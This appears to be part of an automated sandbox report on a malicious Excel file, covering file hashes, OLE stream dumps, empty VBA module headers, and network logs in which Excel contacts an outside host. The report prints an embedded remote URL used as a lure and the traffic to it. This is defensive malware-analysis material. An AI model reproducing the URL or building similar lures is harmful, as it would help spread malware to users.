                Size (bytes):38
                Entropy (8bit):4.218469211370857
                Encrypted:false
                SSDEEP:3:XMzKXvwg3ekVR:wKoPg
                MD5:747C4630DB2B517212CBB21C143BBCC0
                SHA1:C6EF21A5467CEC5C604F2A1D74F3CA01FEA45766
                SHA-256:9BECF04824FD08F7A82078A50CD483D16682F0F04FCABA8464E1AB64CF719283
                SHA-512:195DE64DA15BD3E5731E0C2732565908765429C423D619E679F7D153493532CA37DF5D25D2F107CC960EACA037A27D6875E5C4192D85F01480CB8E757959558C
                Malicious:false
                Preview:Moved Permanently. Redirecting to /404
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):512
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3::
                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                Malicious:false
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Dec 20 07:24:08 2024, Security: 1
                Category:dropped
                Size (bytes):1123840
                Entropy (8bit):7.744269957296979
                Encrypted:false
                SSDEEP:24576:iBajbARM8A18Z+jZ+X+VcVtsnV6+05dpd:ihU1XjZ+uaNb3
                MD5:59B463677F083CB8BF771E27162EF915
                SHA1:D97B1CDBB09E2B4B93F8DE903460FADE41382FF0
                SHA-256:C306DAEB532D48D6F51F35C1612D9BED38E854AA80EB86F14513C06A6BEE67D7
                SHA-512:C8C45E4A7F43E6FF3E60D44367FF43E24753E670DCF9E7D3EBF2D6444AFF7A46C612362B0F83B3683B23098C2F67EE528541FF5D3654D56BA018FA1C018B10A6
                Malicious:true
                Antivirus:
                • Antivirus: Joe Sandbox ML, Detection: 100%
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):512
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3::
                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                Malicious:false
                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Dec 20 07:24:08 2024, Security: 1
                Entropy (8bit):7.744269957296979
                TrID:
                • Microsoft Excel sheet (30009/1) 47.99%
                • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                File name:MS100384UTC.xls
                File size:1'123'840 bytes
                MD5:59b463677f083cb8bf771e27162ef915
                SHA1:d97b1cdbb09e2b4b93f8de903460fade41382ff0
                SHA256:c306daeb532d48d6f51f35c1612d9bed38e854aa80eb86f14513c06a6bee67d7
                SHA512:c8c45e4a7f43e6ff3e60d44367ff43e24753e670dcf9e7d3ebf2d6444aff7a46c612362b0f83b3683b23098c2f67ee528541ff5d3654d56ba018fa1c018b10a6
                SSDEEP:24576:iBajbARM8A18Z+jZ+X+VcVtsnV6+05dpd:ihU1XjZ+uaNb3
                TLSH:763501E5738DAB52C609563575F393AE1714AC03E902423B36F8B31D1AFB6D08643F9A
                Icon Hash:35ed8e920e8c81b5
                Document Type:OLE
                Number of OLE Files:1
                Has Summary Info:
                Application Name:Microsoft Excel
                Encrypted Document:True
                Contains Word Document Stream:False
                Contains Workbook/Book Stream:True
                Contains PowerPoint Document Stream:False
                Contains Visio Document Stream:False
                Contains ObjectPool Stream:False
                Flash Objects Count:0
                Contains VBA Macros:True
                Code Page:1252
                Author:
                Last Saved By:
                Create Time:2006-09-16 00:00:00
                Last Saved Time:2024-12-20 07:24:08
                Creating Application:Microsoft Excel
                Security:1
                Document Code Page:1252
                Thumbnail Scaling Desired:False
                Contains Dirty Links:False
                Shared Document:False
                Changed Hyperlinks:False
                Application Version:786432
                General
                Stream Path:MBD006207A6/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet1
                VBA File Name:Sheet1.cls
                Stream Size:977
                Attribute VB_Name = "Sheet1"
                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                Attribute VB_GlobalNameSpace = False
                Attribute VB_Creatable = False
                Attribute VB_PredeclaredId = True
                Attribute VB_Exposed = True
                Attribute VB_TemplateDerived = False
                Attribute VB_Customizable = True
                

                General
                Stream Path:MBD006207A6/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet2
                VBA File Name:Sheet2.cls
                Stream Size:977
                Attribute VB_Name = "Sheet2"
                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                Attribute VB_GlobalNameSpace = False
                Attribute VB_Creatable = False
                Attribute VB_PredeclaredId = True
                Attribute VB_Exposed = True
                Attribute VB_TemplateDerived = False
                Attribute VB_Customizable = True
                

                General
                Stream Path:MBD006207A6/MBD007203CB/_VBA_PROJECT_CUR/VBA/ThisWorkbook
                VBA File Name:ThisWorkbook.cls
                Stream Size:985
                Attribute VB_Name = "ThisWorkbook"
                Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                Attribute VB_GlobalNameSpace = False
                Attribute VB_Creatable = False
                Attribute VB_PredeclaredId = True
                Attribute VB_Exposed = True
                Attribute VB_TemplateDerived = False
                Attribute VB_Customizable = True
                

                General
                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                VBA File Name:Sheet1.cls
                Stream Size:977
                Attribute VB_Name = "Sheet1"
                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                Attribute VB_GlobalNameSpace = False
                Attribute VB_Creatable = False
                Attribute VB_PredeclaredId = True
                Attribute VB_Exposed = True
                Attribute VB_TemplateDerived = False
                Attribute VB_Customizable = True
                

                General
                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                VBA File Name:Sheet2.cls
                Stream Size:977
                Attribute VB_Name = "Sheet2"
                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                Attribute VB_GlobalNameSpace = False
                Attribute VB_Creatable = False
                Attribute VB_PredeclaredId = True
                Attribute VB_Exposed = True
                Attribute VB_TemplateDerived = False
                Attribute VB_Customizable = True
                

                General
                Stream Path:\x1CompObj
                CLSID:
                File Type:data
                Stream Size:114
                Entropy:4.25248375192737
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                General
                Stream Path:\x5DocumentSummaryInformation
                CLSID:
                File Type:data
                Stream Size:244
                Entropy:2.889430592781307
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                General
                Stream Path:\x5SummaryInformation
                CLSID:
                File Type:data
                Stream Size:200
                Entropy:3.260350317504982
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . \\ 7 ( R . . . . . . . . .
                General
                Stream Path:MBD006207A4/\x1CompObj
                CLSID:
                File Type:data
                Stream Size:99
                Entropy:3.631242196770981
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                General
                Stream Path:MBD006207A4/Package
                CLSID:
                File Type:Microsoft Excel 2007+
                Stream Size:12479
                Entropy:7.0945112382968425
                Base64 Encoded:True
                Data ASCII:P K . . . . . . . . . . ! . . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                General
                Stream Path:MBD006207A5/\x1CompObj
                CLSID:
                File Type:data
                Stream Size:99
                Entropy:3.631242196770981
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                General
                Stream Path:MBD006207A5/Package
                CLSID:
                File Type:Microsoft Excel 2007+
                Stream Size:37036
                Entropy:7.720975169587741
                Base64 Encoded:True
                Data ASCII:P K . . . . . . . . . . ! . 8 . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                General
                Stream Path:MBD006207A6/\x1CompObj
                CLSID:
                File Type:data
                Stream Size:114
                Entropy:4.25248375192737
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                General
                Stream Path:MBD006207A6/\x5DocumentSummaryInformation
                CLSID:
                File Type:data
                Stream Size:244
                Entropy:2.701136490257069
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                General
                Stream Path:MBD006207A6/\x5SummaryInformation
                CLSID:
                File Type:data
                Stream Size:220
                Entropy:3.372234242231489
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . \\ . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . % ? ` * C . . . . . . . . .
                General
                Stream Path:MBD006207A6/MBD0018D4CE/\x1Ole
                CLSID:
                File Type:data
                Stream Size:20
                Entropy:0.5689955935892812
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . .
                Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                General
                Stream Path:MBD006207A6/MBD0018D4CE/\x3ObjInfo
                CLSID:
                File Type:data
                Stream Size:4
                Entropy:0.8112781244591328
                Base64 Encoded:False
                Data ASCII:. . . .
                Data Raw:00 00 03 00
                General
                Stream Path:MBD006207A6/MBD0018D4CE/Contents
                CLSID:
                File Type:Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
                Stream Size:197671
                Entropy:6.989042939766534
                Base64 Encoded:True
                Data ASCII:C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                General
                Stream Path:MBD006207A6/MBD0068D442/\x1CompObj
                CLSID:
                File Type:data
                Stream Size:114
                Entropy:4.219515110876372
                Base64 Encoded:False
                Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                General
                Stream Path:MBD006207A6/MBD0068D442/Package
                CLSID:
                File Type:Microsoft Excel 2007+
                Stream Size:26243
                Entropy:7.635433729726103
                Base64 Encoded:True
                Data ASCII:P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                General
                Stream Path:MBD006207A6/MBD007203CB/\x1CompObj
                CLSID:
                File Type:data
                Stream Size:114
                Entropy:4.25248375192737
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                General
                Stream Path:MBD006207A6/MBD007203CB/\x5DocumentSummaryInformation
                CLSID:
                File Type:data
                Stream Size:248
                Entropy:3.0523231150355867
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P u r c h a s e O r d e r T e m p l a t e . . . . . . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . .
                General
                Stream Path:MBD006207A6/MBD007203CB/\x5SummaryInformation
                CLSID:
                File Type:data
                Stream Size:256
                Entropy:4.086306928392587
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . B r a t i s l a v M i l o j e v i c | E L M E D d . o . o . . . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . N ; . . @ . . . . . . . @ . . . . v @ n ) C . . . . . . . . .
                General
                Stream Path:MBD006207A6/MBD007203CB/Workbook
                CLSID:
                File Type:Applesoft BASIC program data, first line number 16
                Stream Size:134792
                Entropy:7.974168320310173
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . Z i ^ . m . q l % . w " . x . Z q C b g i ' . h . . # . . . . . . . P . . . \\ . p . . 6 u ! l ( n y I T 5 W { L : 1 J . S . . . . 0 x . 3 . ` . X { ( / z 7 / . 8 x X g X # v . . [ d C y . . s . ] G 9 m . u . . . B . . . R a . . . . . . . = . . . L . . . O . . r 7 . v . . . " . . . . " _ K : . . . . . . . . . j # . . . . K . . . . . . . . = . . . " j ! ; . g . . @ . . . . . . . ^ " . . . 9 . . . . r . . . . . . . 1 . . . : . t . ? e . ) n S P x . b & 1
                General
                Stream Path:MBD006207A6/MBD007203CB/_VBA_PROJECT_CUR/PROJECT
                CLSID:
                File Type:ASCII text, with CRLF line terminators
                Stream Size:468
                Entropy:5.269289820125323
                Base64 Encoded:True
                Data ASCII:I D = " { 1 9 C 9 4 3 8 D - F 0 7 5 - 4 2 6 8 - 9 E 6 E - 7 B 8 A E 6 6 D 5 A 0 F } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C D C F 3 A 0 A C A D 2 C E D 2 C E D 2 C E D 2 C E " . . D P B = " 9 9 9 B 6 E 9 3 6 F 9
                General
                Stream Path:MBD006207A6/MBD007203CB/_VBA_PROJECT_CUR/PROJECTwm
                CLSID:
                File Type:data
                Stream Size:83
                Entropy:3.0672749060249043
                Base64 Encoded:False
                Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . . .
                General
                Stream Path:MBD006207A6/MBD007203CB/_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                CLSID:
                File Type:data
                Stream Size:2486
                Entropy:3.9244127831265385
                Base64 Encoded:False
                Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                General
                Stream Path:MBD006207A6/MBD007203CB/_VBA_PROJECT_CUR/VBA/dir
                CLSID:
                File Type:data
                Stream Size:536
                Entropy:6.330646364694152
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . C W ] i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 .
                General
                Stream Path:MBD006207A6/MBD00726B69/\x1CompObj
                CLSID:
                File Type:data
                Stream Size:114
                Entropy:4.219515110876372
                Base64 Encoded:False
                Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                General
                Stream Path:MBD006207A6/MBD00726B69/Package
                CLSID:
                File Type:Microsoft Excel 2007+
                Stream Size:26242
                Entropy:7.635424485665502
                Base64 Encoded:True
                Data ASCII:P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                General
                Stream Path:MBD006207A6/Workbook
                CLSID:
                File Type:Applesoft BASIC program data, first line number 16
                Stream Size:283872
                Entropy:7.743278150467805
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . H < l - 9 . . . . . . . X . @ . . . . . . . . . .
                General
                Stream Path:MBD006207A7/\x1CompObj
                CLSID:
                File Type:data
                Stream Size:99
                Entropy:3.631242196770981
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                General
                Stream Path:MBD006207A7/Package
                CLSID:
                File Type:Microsoft Excel 2007+
                Stream Size:45934
                Entropy:7.5587990853484195
                Base64 Encoded:True
                Data ASCII:P K . . . . . . . . . . ! . . ~ . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                General
                Stream Path:MBD006207A8/\x1Ole
                CLSID:
                File Type:data
                Stream Size:806
                Entropy:5.102215976650107
                Base64 Encoded:False
                Data ASCII:. . . . A . l - { . . . . . . . . . . . . 2 . . . y . . . K . . . . . h . t . t . p . s . : . / . / . s . . . d . e . e . m . o . s . . . c . o . m . / . q . j . E . 1 . B . c . W . g . ? . & . s . m . o . k . e . = . w . e . a . l . t . h . y . & . c . o . m . m . a . = . a . n . n . o . y . e . d . & . t . a . n . k . f . u . l . = . w . a . c . k . y . & . l . i . t . e . r . a . t . u . r . e . . . P . . S . # c - . " . . : P . H 9 M R 3 7 9 k 6 O o ~ g j . . . , / [ . v [ D " v Z c . 4 5 ~ . @ < J . M
                General
                Stream Path:Workbook
                CLSID:
                File Type:Applesoft BASIC program data, first line number 16
                Stream Size:319988
                Entropy:7.998590879161447
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . l k e " . . T R 7 $ + G . ~ " K e . . 9 # } C _ V . . . . . . . . . M . . . \\ . p . r [ O I U . . w . t n 6 3 q H . . F u . [ 8 . L * V ' 1 ) e > . . . . * \\ . . 2 . 5 y . . . d 7 & . . B . . . a . . . % M . . . = . . . . . . . . * 6 @ . j . N ` . . . . . . . . . . a . . . . 3 . . . . . . . . ; . . . . \\ = . . . P ` d > a [ / . . g [ @ . . . @ . . . k " . . . . ` . . . . F 1 . . . 3 . . . . 1 . . . ) $ . $ r V q ) . E | ; [ v . O & L 0 . 1 . . . . . . 5
                General
                Stream Path:_VBA_PROJECT_CUR/PROJECT
                CLSID:
                File Type:ASCII text, with CRLF line terminators
                Stream Size:527
                Entropy:5.254178060321263
                Base64 Encoded:True
                Data ASCII:I D = " { E 1 2 2 2 7 D 7 - 3 F 5 8 - 4 E C 2 - A 9 2 4 - 4 C 8 5 C 1 0 E 7 5 E B } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 1 9 1 B C 7 F D C B F D C B F D C
                General
                Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                CLSID:
                File Type:data
                Stream Size:104
                Entropy:3.0488640812019017
                Base64 Encoded:False
                Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Dec 20, 2024 16:11:49.943598032 CET | 56941 | 53 | 192.168.2.9 | 1.1.1.1
                Dec 20, 2024 16:11:50.350563049 CET | 53 | 56941 | 1.1.1.1 | 192.168.2.9
                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                Dec 20, 2024 16:11:49.943598032 CET | 192.168.2.9 | 1.1.1.1 | 0x6335 | Standard query (0) | s.deemos.com | A (IP address) | IN (0x0001) | false
                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                Dec 20, 2024 16:11:50.350563049 CET | 1.1.1.1 | 192.168.2.9 | 0x6335 | No error (0) | s.deemos.com |  | 14.103.79.10 | A (IP address) | IN (0x0001) | false
                Dec 20, 2024 16:12:01.336961031 CET | 1.1.1.1 | 192.168.2.9 | 0xb849 | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net |  | CNAME (Canonical name) | IN (0x0001) | false
                Dec 20, 2024 16:12:01.336961031 CET | 1.1.1.1 | 192.168.2.9 | 0xb849 | No error (0) | s-part-0035.t-0009.t-msedge.net |  | 13.107.246.63 | A (IP address) | IN (0x0001) | false
                • s.deemos.com
                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                0 | 192.168.2.9 | 49730 | 14.103.79.10 | 443 | 3636 | C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                Timestamp | Bytes transferred | Direction | Data
                2024-12-20 15:11:52 UTC | 252 | OUT | GET /qjE1BcWg?&smoke=wealthy&comma=annoyed&tankful=wacky&literature HTTP/1.1
                Accept: */*
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                Host: s.deemos.com
                Connection: Keep-Alive
                2024-12-20 15:11:53 UTC | 397 | IN | HTTP/1.1 301 Moved Permanently
                Date: Fri, 20 Dec 2024 15:11:52 GMT
                Content-Type: text/plain; charset=utf-8
                Content-Length: 38
                Connection: close
                X-DNS-Prefetch-Control: off
                X-Frame-Options: SAMEORIGIN
                Strict-Transport-Security: max-age=15724800; includeSubDomains
                X-Download-Options: noopen
                X-Content-Type-Options: nosniff
                X-XSS-Protection: 1; mode=block
                Location: /404
                Vary: Accept
                2024-12-20 15:11:53 UTC | 38 | IN |
                Data Ascii: Moved Permanently. Redirecting to /404


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                1 | 192.168.2.9 | 49731 | 14.103.79.10 | 443 | 3636 | C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                Timestamp | Bytes transferred | Direction | Data
                2024-12-20 15:11:54 UTC | 193 | OUT | GET /404 HTTP/1.1
                Accept: */*
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                Host: s.deemos.com
                Connection: Keep-Alive
                2024-12-20 15:11:55 UTC | 448 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 20 Dec 2024 15:11:55 GMT
                Content-Type: text/html; charset=utf-8
                Content-Length: 4645
                Connection: close
                X-DNS-Prefetch-Control: off
                X-Frame-Options: SAMEORIGIN
                Strict-Transport-Security: max-age=15724800; includeSubDomains
                X-Download-Options: noopen
                X-Content-Type-Options: nosniff
                X-XSS-Protection: 1; mode=block
                X-Powered-By: Next.js
                ETag: "1225-4lR+8o8+z0M1Iq6OMuNgxAtPjT8"
                Vary: Accept-Encoding
                2024-12-20 15:11:55 UTC | 3620 | IN |
